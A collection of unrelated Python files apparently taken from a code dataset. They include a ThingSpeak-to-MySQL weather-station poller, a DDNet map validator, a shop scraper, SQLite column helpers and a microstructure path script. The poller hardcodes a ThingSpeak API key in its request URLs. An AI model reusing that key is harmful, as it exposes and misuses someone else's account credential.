in data['feeds']:\n listRazinaCO2.append(RazinaCO2['field5'])\n\n for RazinaCO in data['feeds']:\n listRazinaCO.append(RazinaCO['field6'])\n\n for DetekcijaOpasnihPlinova in data['feeds']:\n listDetekcijaOpasnihPlinova.append(DetekcijaOpasnihPlinova['field7'])\n\n for CreatedAt in data['feeds']:\n listCreatedAt.append(CreatedAt['created_at'])\n\n for i in range(0, jsonLastID):\n insert = \"INSERT INTO meteoroloskaStanica VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(insert, (listEntryID[i], listID[i], listTemperaturaZraka[i], listVlagaZraka[i], listKvalitetaZraka[i], listRazinaCO2[i], listRazinaCO[i], listDetekcijaOpasnihPlinova[i], listCreatedAt[i]))\n\n print(\"Podaci upisani u bazu podataka.\\n\")\n conn.commit()\n\n\n\"\"\"\n Metoda provjerava ako je baza podataka potpuno prazna.\n Ako je, poziva metodu Entry() koja upisuje 100 podataka (maksimum for petlje je 100) u bazu.\n Ako baza ima podatke, metoda ne radi nista i program se nastavlja.\n\"\"\"\n\ndef checkIfDatabaseIsEmpty():\n cursor.execute(\"SELECT * FROM meteoroloskaStanica\")\n cursor.fetchall()\n brojPodatka = cursor.rowcount\n \n if (brojPodatka != 0):\n print(\"Baza ima podatke.\\n\")\n elif (brojPodatka == 0):\n print(\"Baza je prazna. Dodavanje podataka...\")\n Entry()\n\ncheckIfDatabaseIsEmpty()\n\n\"\"\"\n Ispred metode updateDatabase definirane su liste za azuriranje baze podataka.\n !!! updateDatabase() je pozvan tek u while loopu na kraju koda !!!\n Metoda updateDatabase() azurira bazu podataka:\n 1. Posalje se novi request za json sa thingspeak-a, ali ovaj put samo za zadnjim unesenim podatkom (zato je &results=1 u URL-u)\n 2. Podaci se stavljaju u updated liste i zatim na isti nacin kao i kod Entry() metode upisuju u bazu podataka\n 3. Nakon toga se liste ociste i ostanu prazne tako da su spremne za novi update. To se radi naredbom npr. del updateEntryID[:]\n 4. Postavlja se updatedLastEntryID na najnoviji last_entry_id. To je polje u jsonu koje nam govori koje je id od zadnjeg upisanog podatka.\n\"\"\"\n\nupdateEntryID = []\nupdateID = []\nupdateTemperaturaZraka = []\nupdateVlagaZraka = []\nupdateKvalitetaZraka = []\nupdateRazinaCO2 = []\nupdateRazinaCO = []\nupdateDetekcijaOpasnihPlinova = []\nupdateCreatedAt = []\n\ndef updateDatabase():\n with urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696/feeds.json?api_key=E5V4C2KMUN5S4BWM&results=1\") as url:\n updateData = json.loads(url.read().decode())\n \n for newEntryID in updateData['feeds']:\n updateEntryID.append(newEntryID['entry_id'])\n \n for newID in updateData['feeds']:\n updateID.append(newID['field1'])\n\n for newTemperaturaZraka in updateData['feeds']:\n updateTemperaturaZraka.append(newTemperaturaZraka['field2'])\n\n for newVlagaZraka in updateData['feeds']:\n updateVlagaZraka.append(newVlagaZraka['field3'])\n\n for newKvalitetaZraka in updateData['feeds']:\n updateKvalitetaZraka.append(newKvalitetaZraka['field4'])\n\n for newRazinaCO2 in updateData['feeds']:\n updateRazinaCO2.append(newRazinaCO2['field5'])\n\n for newRazinaCO in updateData['feeds']:\n updateRazinaCO.append(newRazinaCO['field6'])\n\n for newDetekcijaOpasnihPlinova in updateData['feeds']:\n updateDetekcijaOpasnihPlinova.append(newDetekcijaOpasnihPlinova['field7'])\n\n for newCreatedAt in updateData['feeds']:\n updateCreatedAt.append(newCreatedAt['created_at'])\n\n for i in range(0, 1):\n insert = \"INSERT INTO meteoroloskaStanica VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(insert, (updateEntryID[i], updateID[i], updateTemperaturaZraka[i], updateVlagaZraka[i], updateKvalitetaZraka[i], updateRazinaCO2[i], updateRazinaCO[i], updateDetekcijaOpasnihPlinova[i], updateCreatedAt[i]))\n\n print(\"Podaci upisani u bazu podataka.\")\n conn.commit()\n \n del updateEntryID[:]\n del updateID[:]\n del updateTemperaturaZraka[:]\n del updateVlagaZraka[:]\n del updateKvalitetaZraka[:]\n del updateRazinaCO2[:]\n del updateRazinaCO[:]\n del updateDetekcijaOpasnihPlinova[:]\n del updateCreatedAt[:]\n \n with urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696.json?api_key=E5V4C2KMUN5S4BWM\") as url:\n channelDataUpdate2 = json.loads(url.read().decode())\n \n del updateLastEntryID[:]\n updateLastEntryID.append(channelDataUpdate2['last_entry_id'])\n\n\n\"\"\"\n while True loop preko metoda checkForUpdate() stalno provjerava je li se promjenio 'last_entry_id' tako da:\n 1. Stalno se provjerava 'last_entry_id' naredbom:\n listLastEntryID.append(channelData['last_entry_id'])\n 2. U if petlji se usporeduje sa updatedLastEntryID koji je IZVAN while petlje i metode postavljen na isto:\n updateLastEntryID.append(channelData['last_entry_id'])\n\n Ako su obije varijable iste, baza podataka se ne mijenja i ispisuje se poruka da je azurirana.\n U suprotnom, baza se azurira i zatim se poziva metoda updateDatabase() koja na svom kraju\n postavlja novi updatedLastEntryID. Tako LastEntryID i updateLastEntryID opet postaju isti dok se ne pojavi\n novi last_entry_id podatak na jsonu.\n\n time.sleep naredba vrti while loop svakih 5 sekundi.\n\"\"\"\n\ndelay = 5\n\nlistLastEntryID = []\n\nupdateLastEntryID = []\nupdateLastEntryID.append(channelData['last_entry_id'])\n\ndef checkForUpdate():\n with urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696.json?api_key=E5V4C2KMUN5S4BWM\") as url:\n channelDataUpdate = json.loads(url.read().decode())\n \n listLastEntryID.append(channelDataUpdate['last_entry_id'])\n \n dt = datetime.datetime.now()\n \n if(listLastEntryID == updateLastEntryID):\n print(\"Baza je azurirana.\")\n print(dt)\n print(\"\\n\")\n del listLastEntryID[:]\n elif(listLastEntryID != updateLastEntryID):\n print(\"\\nAzuriranje baze podataka...\")\n updateDatabase()\n print(\"Baza podataka azurirana.\")\n print(dt)\n print(\"\\n\")\n del listLastEntryID[:]\n \nwhile True:\n print(\"updatedLastEntryID = \" + str(updateLastEntryID))\n \n checkForUpdate();\n \n time.sleep(delay)\n \nconn.close()","sub_path":"serverSkripte/JSON_To_MySQL_MeteoroloskaStanica.py","file_name":"JSON_To_MySQL_MeteoroloskaStanica.py","file_ext":"py","file_size_in_byte":8255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"171177147","text":"import importlib\n\n\ndef assert_dep(name):\n assert importlib.util.find_spec(name), \"需要安装 %s\" % name\n\n\ndef login():\n import inquirer\n import 手机登录, 二维码登录\n\n methods = {\"手机登录\": 手机登录, \"二维码登录\": 二维码登录}\n assert methods[\n inquirer.prompt([inquirer.List(\"method\", message=\"登陆方法\", choices=methods)])[\n \"method\"\n ]\n ].login(), \"登录失败\"\n from pyncm import GetCurrentSession\n\n print(\n \"已登录\",\n GetCurrentSession().nickname,\n \"曾用 IP:\",\n GetCurrentSession().lastIP,\n \"用户 ID:\",\n GetCurrentSession().uid,\n )\n return True\n\n\nassert_dep(\"pyncm\")\nassert_dep(\"inquirer\")\nfrom pyncm import __version__\n\nprint(\"PyNCM %s\" % __version__)\n","sub_path":"demos/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"110859488","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport argparse\nimport subprocess\nimport re\n\nsys.path.append('/srv/tw/race/tml')\n\nfrom tml.tml import Teemap\nfrom tml.constants import TILEINDEX, TELEINDEX, SPEEDUPINDEX, EXTERNAL_MAPRES\n\nimport tw\n\n\n# Exceptions:\n# - run_300_from_scratch uses tunes\n# - run_crossover uses weapon tele\n# - ctf1-7 not checked, we can't change standard maps\n\n\nRACE_SETTINGS = set(['sv_health_and_ammo 1', 'sv_kill_grenades 1'])\nNOHARM_SETTINGS = set(['sv_delete_grenades_after_death 0', 'sv_infinite_ammo 1', \\\n 'sv_pickup_respawn -1', 'sv_regen 0', 'sv_rocket_jump_damage 0', \\\n 'sv_strip 0', 'sv_teleport 0', 'sv_teleport_grenade 0', 'sv_teleport_kill 0', \\\n 'sv_teleport_vel_reset 0', 'sv_teleport 1', 'sv_no_items 0', 'tune_zone .*'])\n\nENTITIES_OFF_SIGN = [190, 191]\nFRONT_TILES = list(map(TILEINDEX.get, ['air', 'death', 'start', 'finish', \\\n 'armor', 'health', 'shotgun', 'grenade', 'ninja', 'rifle', \\\n 'stopper', 'stopper_twoway', 'stopper_allway'])) + ENTITIES_OFF_SIGN\nGAME_TILES = list(map(TILEINDEX.get, ['solid', 'nohook'])) + ENTITIES_OFF_SIGN\nNOHARM_TILES = [29, 30, 31, 68, 93, 94, 134, 176]\n\nTELE_TILES = list(map(TELEINDEX.get, ['air', 'from', 'from_evil', 'to', 'cp', \\\n 'cp_from', 'cp_from_evil', 'cp_to']))\n\n\ndef err(msg):\n global success\n if show_error:\n print(\"Error: {}: {}\".format(mapname, msg))\n success = False\n\ndef crit(msg):\n global success\n print(\"Critical: {}: {}\".format(mapname, msg))\n success = False\n\ndef load_map():\n try:\n t = Teemap(mappath)\n return t\n except Exception as err:\n crit(err)\n\ndef validate_settings(t):\n if not t.info or not t.info.settings:\n return\n settings = set([s.decode() for s in t.info.settings])\n if not settings or settings == set(['']):\n return\n if mapname == 'run_300_from_scratch':\n return\n if gametype == 'race' and all(any(re.match(r, s) for r in RACE_SETTINGS) for s in settings):\n return\n if all(any(re.match(r, s) for r in NOHARM_SETTINGS) for s in settings):\n err(\"Invalid server settings\")\n else:\n crit(\"Invalid server settings {}\".format(settings - NOHARM_SETTINGS))\n\ndef validate_mapres(t):\n for image in t.images:\n if image.external and image.name not in EXTERNAL_MAPRES:\n err(\"Mapre '{}' not embedded\".format(image.name))\n\ndef validate_layers(t):\n if t.switchlayer:\n crit(\"Switch layer forbidden\")\n if t.tunelayer and mapname != 'run_300_from_scratch':\n err(\"Tune layer forbidden\")\n\ndef validate_gametiles(t):\n spawn_count = 0\n spawn_red_count = 0\n spawn_blue_count = 0\n flag_red_count = 0\n flag_blue_count = 0\n\n warned = []\n layers = [t.gamelayer]\n if t.frontlayer:\n layers.append(t.frontlayer)\n for layer in layers:\n for tile in layer.gametiles:\n if tile.index in FRONT_TILES:\n continue\n if layer.is_gamelayer and tile.index in GAME_TILES:\n continue\n if TILEINDEX['cp_first'] <= tile.index <= TILEINDEX['cp_last']:\n continue\n\n if tile.index == TILEINDEX['spawn']:\n spawn_count += 1\n continue\n elif tile.index == TILEINDEX['spawn_red']:\n spawn_red_count += 1\n continue\n elif tile.index == TILEINDEX['spawn_blue']:\n spawn_blue_count += 1\n continue\n elif tile.index == TILEINDEX['flagstand_red']:\n flag_red_count += 1\n continue\n elif tile.index == TILEINDEX['flagstand_blue']:\n flag_blue_count += 1\n continue\n\n if tile.index not in warned:\n layer_name = 'gamelayer' if layer.is_gamelayer else 'frontlayer'\n if tile.index in NOHARM_TILES:\n err(\"Invalid index {} in {}\".format(tile.index, layer_name))\n else:\n crit(\"Invalid index {} in {}\".format(tile.index, layer_name))\n warned.append(tile.index)\n\n if gametype == 'race' and (spawn_count == 0 or spawn_red_count != 0 or spawn_blue_count != 0 or\n flag_red_count != 0 or flag_blue_count != 0):\n crit(\"Invalid spawn or flagstand count\")\n if gametype == 'race' and spawn_count > 1:\n err(\"More than one spawns\")\n if gametype == 'fastcap' and (spawn_count != 0 or spawn_red_count == 0 or spawn_blue_count == 0 or\n flag_red_count != 1 or flag_blue_count != 1):\n crit(\"Invalid spawn or flagstand count\")\n\ndef validate_teletiles(t):\n if not t.telelayer:\n return\n warned = []\n for tile in t.telelayer.gametiles:\n if tile.index in TELE_TILES:\n continue\n if mapname == 'run_crossover' and tile.index == TELEINDEX['weapon']:\n continue\n if tile.index not in warned:\n crit(\"Invalid index {} in telelayer\".format(tile.index))\n warned.append(tile.index)\n\ndef validate_speeduptiles(t):\n if not t.speeduplayer:\n return\n for tile in t.speeduplayer.gametiles:\n if tile.index not in [0, SPEEDUPINDEX]:\n err(\"Invalid index in speeduplayer\")\n return\n\ndef validate_map(path, gtype, only_critical=False):\n global mappath, mapname, gametype, show_error, success\n\n mappath = path\n mapname = os.path.basename(path)[:-4]\n gametype = gtype\n show_error = not only_critical\n success = True\n\n t = load_map()\n if t:\n validate_settings(t)\n validate_mapres(t)\n validate_layers(t)\n validate_gametiles(t)\n validate_teletiles(t)\n validate_speeduptiles(t)\n\n if show_error:\n ddnet_build_dir = os.path.join(tw.srcdir, 'ddnet', 'build')\n p = subprocess.run([os.path.join(ddnet_build_dir, 'map_convert_07'), mappath, '/dev/null'],\n cwd=ddnet_build_dir, capture_output=True, text=True)\n for message in re.findall(f'\\[map_convert_07\\]: {re.escape(mappath)}: (.*)', p.stdout):\n err(message)\n\n return success\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('mapfile', help=\"path to the map file\")\n parser.add_argument('category', choices=[\"Short\", \"Middle\", \"Long Easy\", \"Long Advanced\", \"Long Hard\", \"Fastcap\"])\n args = parser.parse_args()\n\n if validate_map(args.mapfile, 'fastcap' if args.category == \"Fastcap\" else 'race'):\n print(\"Found no errors\")\n","sub_path":"race/validate_map.py","file_name":"validate_map.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"129388296","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nCSV = 'product.csv'\nHOST = 'https://zoomagazin.dp.ua/'\nURL = 'https://zoomagazin.dp.ua/catalog/sobaki/pitanie-sobak/korma-dlya-sobak/'\n\nHEADERS = {\n 'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'\n}\n\ndef get_html(url, params=''):\n req = requests.get(url, headers=HEADERS, params=params)\n return req\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('div', class_='product-layout')\n\n products = []\n\n for item in items:\n products.append(\n {\n 'handleId': '',\n 'fieldType': 'Product',\n 'name': item.find('div', class_='caption').find('a').get_text(strip=True),\n 'description': '',\n 'img': item.find('div', class_='image').find('a').get('href'),\n 'price': item.find('div', class_='kit').find('p').get_text(strip=True)\n }\n )\n return products\n\ndef save_doc(items, path):\n with open(path, 'w', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow(['handleId', 'fieldType', 'name', 'description', 'productImageUrl', 'price'])\n for item in items:\n writer.writerow([item['handleId'], item['fieldType'], item['name'], item['description'], item['img'], item['price']])\n\ndef parser():\n PAG = input('How PAGES: ')\n PAG = int(PAG.strip())\n html = get_html(URL)\n if html.status_code == 200:\n products = []\n for page in range(1, PAG):\n print(f'Procesing: {page}')\n html = get_html(URL, params={'page': page})\n products.extend(get_content(html.text))\n save_doc(products, CSV)\n pass\n else:\n print('Err')\n\nparser()\n\n# html = get_html(URL)\n# print(get_content(html.text))\n","sub_path":"parser1.py","file_name":"parser1.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"394157717","text":"import sqlite3\n\ndef Delete_Column(DB_name,table_name, *columns):\n\ttry:\n\t\tdb = sqlite3.connect(DB_name)\n\t\tsql = db.cursor()\n\t\t#columns = iterCols if iterCols!=None and len(iterCols)!=0 else columns\n\t\tquery = sql.execute(\"PRAGMA table_info(%s)\" % table_name)\n\t\tquery = list(query)\n\t\t\n\t\tif len(query) != 0:\n\t\t\t\tcols = {}\n\t\t\t\tfor col in query:\n\t\t\t\t\tcols.setdefault(col[1],col[2])\n\t\t\t\tfor col in columns:\n\t\t\t\t\tcols.pop(col)\n\t\t\t\tif len(cols) == 0:\n\t\t\t\t\traise NameError\n\n\t\t\t\tquery = ','.join(cols.keys())\n\t\t\t\tdata = list(sql.execute(\"SELECT %s FROM \" % query +table_name))\n\t\t\t\tsql.execute(\"DROP TABLE \"+table_name)\n\n\t\t\t\tnewCols = ''\n\t\t\t\tfor col in cols.items():\n\t\t\t\t\tnewCols += ' '.join(col)+','\n\n\t\t\t\tquery = \"CREATE TABLE {0} ({1})\".format(table_name, newCols.strip(','))\n\t\t\t\tsql.execute(query)\n\n\t\t\t\tcols = [\"?\" for _ in range(len(cols))]\n\t\t\t\tquery = \"INSERT INTO \"+table_name+\" VALUES (%s)\" % ','.join(cols)\n\t\t\t\tsql.executemany(query, data)\n\t\t\t\tdb.commit()\n\t\t\t\tprint(\"Colunms successfully deleted\")\n\t\telse: print(\"NO SUCH TABLE\")\n\texcept sqlite3.OperationalError as e: print(\"Wrong arguments!\")\n\texcept NameError: print(\"COUNT OF COLUNMS IS LESS THEN 1 !\")\n\texcept (KeyError,TypeError): print(\"NO SUCH COLUNM!\")\n\texcept Exception as e: print(\"Something went wrong :(\",e)\n\ndef Rename_Colunm(DB_name,table_name,colunm_name,new_name):\n\ttry:\n\t\tdb = sqlite3.connect(DB_name)\n\t\tsql = db.cursor()\n\n\t\tquery = sql.execute(\"PRAGMA table_info(%s)\" % table_name)\n\t\tquery = list(query)\n\t\t\n\t\tif len(query) != 0 and colunm_name != new_name:\n\t\t\t\tcols = {}\n\t\t\t\tfor col in query:\n\t\t\t\t\tcols.setdefault(col[1],col[2])\n\n\t\t\t\tquery = ','.join(cols.keys())\n\t\t\t\tdata = list(sql.execute(\"SELECT %s FROM \" % query +table_name))\n\t\t\t\t\n\t\t\t\tsql.execute(\"ALTER TABLE \"+table_name+\" RENAME TO T_M_P\")\n\n\t\t\t\tnewCols = ''\n\t\t\t\tfor col in cols.items():\n\t\t\t\t\tnewCols += ' '.join(col)+','\n\t\t\t\tnewCols = newCols.replace(colunm_name,new_name)\n\t\t\t\tquery = \"CREATE TABLE {0} ({1})\".format(table_name, newCols.strip(','))\n\t\t\t\tsql.execute(query)\n\n\t\t\t\tcols = [\"?\" for _ in range(len(cols))]\n\t\t\t\tquery = \"INSERT INTO \"+table_name+\" VALUES (%s)\" % ','.join(cols)\n\t\t\t\tsql.executemany(query, data)\n\t\t\t\tsql.execute(\"DROP TABLE T_M_P\")\n\t\t\t\tdb.commit()\n\t\t\t\tprint(\"Something was done...\")\n\t\telif colunm_name == new_name:\n\t\t\tprint(\"Wrong arguments!\")\n\t\telse: print(\"NO SUCH TABLE\")\n\n\texcept sqlite3.OperationalError as e: \n\t\tsql.execute(\"ALTER TABLE T_M_P RENAME TO \"+table_name)\n\t\tprint(\"Wrong arguments:\",e)\n\texcept Exception as e: \n\t\tsql.execute(\"ALTER TABLE T_M_P RENAME TO \"+table_name)\n\t\tprint(\"Something went wrong :(\",e)","sub_path":"Python/PlayListStore_4.0/sql_dlc.py","file_name":"sql_dlc.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"639436628","text":"import logging\nfrom sklearn.naive_bayes import GaussianNB\n\n# init logging\nlog_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\nlogging.basicConfig(level=logging.INFO, format=log_fmt)\nlogger = logging.getLogger(__name__)\n\n\ndef train_test_svm(X_train, y_train, X_test, y_test):\n gnb = GaussianNB()\n y_pred = gnb.fit(X_train, y_train).predict(X_test)\n logger.info('size {}'.format(y_test.shape[0]))\n logger.info('result {}'.format(((y_test != y_pred).sum())/y_test.shape[0]))\n","sub_path":"src/learners/bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564378830","text":"from random import randint\nimport math\n\n\"\"\"\n分段函数求值\n\n 3x - 5 (x > 1)\nf(x) = x + 2 (-1 <= x <= 1)\n 5x + 3 (x < -1)\n\nVersion: 0.1\nAuthor: Jing\n\"\"\"\n\n\"\"\" Example\nx = float(input('x = '))\nif x>1:\n y=3*x-5\nelif x>=-1 and x<=1:\n y=x+2\nelse:\n y=5*x+3\n\nprint('f(%.2f) = %.2f' % (x, y))\n\"\"\"\n\n\ndef incm_transfer():\n value = float(input('请输入长度:'))\n unit = input('请输入单位:')\n\n if unit=='in' or unit=='英寸':\n print('%f英寸 = %f厘米' % (value, value*2.54))\n elif unit=='cm' or unit=='厘米':\n print('%.2f厘米 = %.2f英寸' % (value, value/2.54))\n else:\n print('请输入有效的单位!')\n\n\ndef random_task_to_do():\n face = randint(1,6)#get a random int among[1-6] a <= N <= b\n if face == 1:\n result = '唱首歌'\n elif face ==2:\n result = '跳个舞'\n elif face ==3:\n result = '学狗叫'\n elif face ==4:\n result = '做俯卧撑'\n elif face ==5:\n result = '念绕口令'\n else:\n result = '讲冷笑话'\n print(result)\n\ndef score_to_level():\n score = float(input('请输入成绩:'))\n if score >=90:\n grade = 'A'\n elif score>=80:\n grade = 'B'\n elif score>=70:\n grade = 'C'\n elif score>=60:\n grade = 'D'\n else:\n grade = 'E'\n print('对应的等级是:', grade)\n\ndef is_triangle():\n a = float(input('a = '))\n b = float(input('b = '))\n c = float(input('c = '))\n\n if a+b>c and a+c>b and b+c>a:\n print('周长:%.2f' % (a+b+c) )\n p=(a+b+c)/2\n area=math.sqrt(p*(p-a)*(p-b)*(p-c))\n print('面积:%.2f' % (area))\n else:\n print('不能构成三角形')\n\ndef individual_income_tax():\n salary = float(input('本月收入:'))\n insurance = float(input('五险一金:'))\n diff = salary-insurance-3500\n if diff <= 0:\n rate = 0\n deduction=0\n elif diff <1500:\n rate = 0.03\n deduction = 0\n elif diff <4500:\n rate = 0.1\n deduction = 105\n elif diff <9000:\n rate = 0.2\n deduction = 555\n elif diff <35000:\n rate = 0.25\n deduction = 1005\n elif diff <55000:\n rate = 0.3\n deduction = 2755\n elif diff <80000:\n rate = 0.35\n deduction = 5505\n else:\n rate = 0.45\n deduction = 13505\n tax = abs(diff*rate - deduction)\n print('个人所得税:¥%.2f元' % tax )\n print('实际到手收入:¥%.2f元' % (diff+3500-tax))\n\ndef verify():\n username = input('请输入用户名:')\n password = input('请输入密码:')\n if username=='admin' and password=='123456':\n print('身份验证成功!')\n else:\n print('身份验证失败!')\n\n\nif __name__==\"__main__\":\n # incm_transfer()\n # random_task_to_do()\n # score_to_level()\n # is_triangle()\n # individual_income_tax()\n # verify()\n pass","sub_path":"Day01-15/Day003/Day3_if.py","file_name":"Day3_if.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"469805607","text":"import microstructure as mStr\nfrom numpy import linspace, pi, sin, cos, concatenate, zeros_like, zeros\nfrom copy import deepcopy\n\n# _______________________________________________________________________\n\n# slab\nnumSlabs = 4 # pocet stlpikov podopierajucich gulovite uchytky\nnumRays = 2 # pocet lucov\nslabSpeed = 50 # rychlost polymerizovania stlpika\nxyres = 0.25 # vzdialenost medzi ciarami pri budovani stlpika\nslabSz = [1, 1, 8] # rozmer stlpika [x,y,z]\n\n# circle\ncircSpeed = 80 # rychlost polymerizacie kruhu\ncircR = 10 # polomer kruhu\ncircPoints = 50 # pocet bodov kruznice\nnumCircles = 2 # pocet kruznic tvoriacich polymerizovany kruh v oboch smeroch\ncircDist = 0.1 # vzdialenost kruznic pri polymerizovani kruhu\n\n# sphere\nsphereR = 1.0 # polomer gulicky na stlpikoch\nsphereRayR = 0.5 # polomer gulicky \"zdureniny\" z ktrej ide luc z kruhu\nsphereSpeed = 20 # rychlost polymerizovania gulicky\narmSphereR = 1 # polomer efektorovej gulicky\narmSphereHeight = 2 # vyska gulicky nad podlahou\n\n# arm (usecky alebo aj krivky ako napr. sinus)\narmSpeed = 50 # rychlost polymerizacie luca\narmPoints = 50 # pocet bodov - iba v pripade kriviek\narmAmplit = 1.0 # amplituda Y (v pripade krivky), 0 je rovna ciara\n\n# wall \nwallCircSpeed = 80 # rychlost polymerizacie kruhu\nwallCircR = 30 # polomer kruhu\nwallCircPoints = 50 # pocet bodov kruznice\nwallNumCircles = [4, 70] # pocet kruznic tvoriacich polymerizovany kruh v smeroch [X, Z]\nwallCircDist = 0.2 # vzdialenost kruznic pri polymerizovani kruhu\n# _______________________________________________________________________\n\ndef DoLine(P1, P2):\n lineArr = zeros((2, 5))\n lineArr[:, 0] = [P1[0], P2[0]]\n lineArr[:, 1] = [P1[1], P2[1]]\n lineArr[:, 2] = [P1[2], P2[2]]\n lineArr[:, 3] = 1\n lineArr[-1, 3:5] = [0, armSpeed]\n return lineArr\n\ndef circle(radius, elev):\n phivec = linspace(0, 2*pi, circPoints)\n arr = zeros((len(phivec), 5))\n arr[:, 0] = cos(phivec) * radius\n arr[:, 1] = sin(phivec) * radius\n arr[:, 2] = elev\n arr[:, 3] = 1\n arr[-1, 3:5] = [0, circSpeed]\n return arr\n\ndef SinusLine(P1, P2):\n x1 = linspace(-pi/2, pi/2, armPoints/2)\n x2 = linspace(pi/2, 3*pi/2, armPoints)\n x3 = linspace(3*pi/2, 5*pi/2, armPoints/2)\n y1 = sin(x1)*0.5+0.5\n y2 = sin(x2)\n y3 = sin(x3)*0.5-0.5\n x = concatenate((x1[0:-1], x2, x3[1:]))\n y = concatenate((y1[0:-1], y2, y3[1:]))\n\n x = (x-min(x))/x.ptp()\n x = x * (P2[2] - P1[2]) + P1[2]\n y = y * armAmplit\n\n sinLine = zeros((len(x), 5))\n sinLine[:, 0] = P1[0]-y\n sinLine[:, 1] = P1[1]\n sinLine[:, 2] = x \n sinLine[:, 3] = 1\n sinLine[-1, 3:5] = [0, armSpeed]\n\n return sinLine\n\n\n# rozdeli 0-360 stupnov na 3 casti (4 okrajove body)\nverts = linspace(pi/4, 9*pi/4, numSlabs+1)\nslabPosX = cos(verts) * circR\nslabPosY = sin(verts) * circR\n\n# postavi stredovy stlpik \nslab0 = mStr.slabStr([slabSz[0], slabSz[1], slabSz[2] + 2*sphereR],[0, 1, 2], [xyres, 0.2], slabSpeed)\nslab0.shift([-slabSz[0]/2, -slabSz[1]/2, 0])\nviscoStruct = slab0\n\nfor i in range(numSlabs):\n #stlpik pod kruhom ukonceny gulickou\n slab1 = mStr.slabStr([slabSz[0], slabSz[1], slabSz[2] + sphereR/3],[0, 1, 2], [xyres, 0.2], slabSpeed)\n slab1.shift([slabPosX[i]-slabSz[0]/2, slabPosY[i]-slabSz[1]/2, 0])\n viscoStruct.addStr(slab1)\n sph1 = mStr.sphereStr(slabPosX[i], slabPosY[i], slabSz[2]+sphereR, sphereR, sphereSpeed, xyres, 1.0, 1, shellspacing=0.5)\n viscoStruct.addStr(sph1)\n\n# prida priecky (vystuze kruhu)\ncrossLine1 = DoLine([slabPosX[0], slabPosY[0], slabSz[2]], [slabPosX[2], slabPosY[2], slabSz[2]])\nviscoStruct.addStr(mStr.MicroStr(crossLine1))\ncrossLine2 = DoLine([slabPosX[1], slabPosY[1], slabSz[2]], [slabPosX[3], slabPosY[3], slabSz[2]])\nviscoStruct.addStr(mStr.MicroStr(crossLine2))\n\n# telo kruhu\nfor i in range(-numCircles, numCircles):\n circElevation = slabSz[2] + sphereR + i*circDist\n for j in range(-numCircles, numCircles):\n circ = mStr.MicroStr(circle(circR + j*circDist, circElevation))\n viscoStruct.addStr(circ)\n\n# rozdeli 45-405 stupnov na 3 casti (4 okrajove body)\nvertsRay = linspace(0, 2*pi, numRays+1)\nslabRayPosX = cos(vertsRay) * circR\nslabRayPosY = sin(vertsRay) * circR\n\n # stlpiky pod zaciatkom a koncom luca ukoncene gulickou\nfor i in range(numRays):\n sphRay1 = mStr.sphereStr(slabRayPosX[i], slabRayPosY[i], slabSz[2]+sphereR, sphereRayR, sphereSpeed, xyres, 1.0, 1, shellspacing=0.5)\n viscoStruct.addStr(sphRay1)\n \n# luce az nakoniec lebo su tenke, luc ma sinusovy priebeh\nfor i in range(numRays):\n P1 = [slabRayPosX[i], slabRayPosY[i], slabSz[2] + sphereR]\n P2 = [slabRayPosX[i], slabRayPosY[i], 0]\n lineArr = SinusLine(P1, P2)\n #lineArr = DoLine(P1, P2)\n viscoStruct.addStr(mStr.MicroStr(lineArr))\n\n# gulicka do stredu luca\nfor i in range(numRays):\n #sphRay2 = mStr.sphereStr(slabRayPosX[i], slabRayPosY[i], armSphereHeight+sphereR, armSphereR, sphereSpeed, xyres, 1.0, 1, shellspacing=0.5)\n sphRay2 = mStr.sphereStr(slabRayPosX[i], slabRayPosY[i], (slabSz[2] + sphereR)/2, armSphereR, sphereSpeed, xyres, 1.0, 1, shellspacing=0.5)\n viscoStruct.addStr(sphRay2)\n\n\"\"\" \n# telo kruhovej ohrady\nwall = mStr.MicroStr(zeros((0,5)))\nfor i in range(wallNumCircles[1]):\n circElevation = i*wallCircDist\n for j in range(wallNumCircles[0]):\n circ = mStr.MicroStr(circle(wallCircR + j*wallCircDist, circElevation))\n wall.addStr(circ)\n\nviscoStruct.addStr(wall)\n\"\"\"\nviscoStruct.plot(1, markerscalef=0.1)\n","sub_path":"viscoCircleDown_1.py","file_name":"viscoCircleDown_1.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"153281831","text":"import logging\nimport sys\nimport datetime\nimport os \nfrom os.path import join, exists\ndef set_logger(logger):\n formatter = logging.Formatter(\n \"%(asctime)s - %(filename)s:%(lineno)s - %(levelname)s - %(message)s\"\n )\n\n \n logger.setLevel(logging.INFO)\n logger.handlers = []\n\n 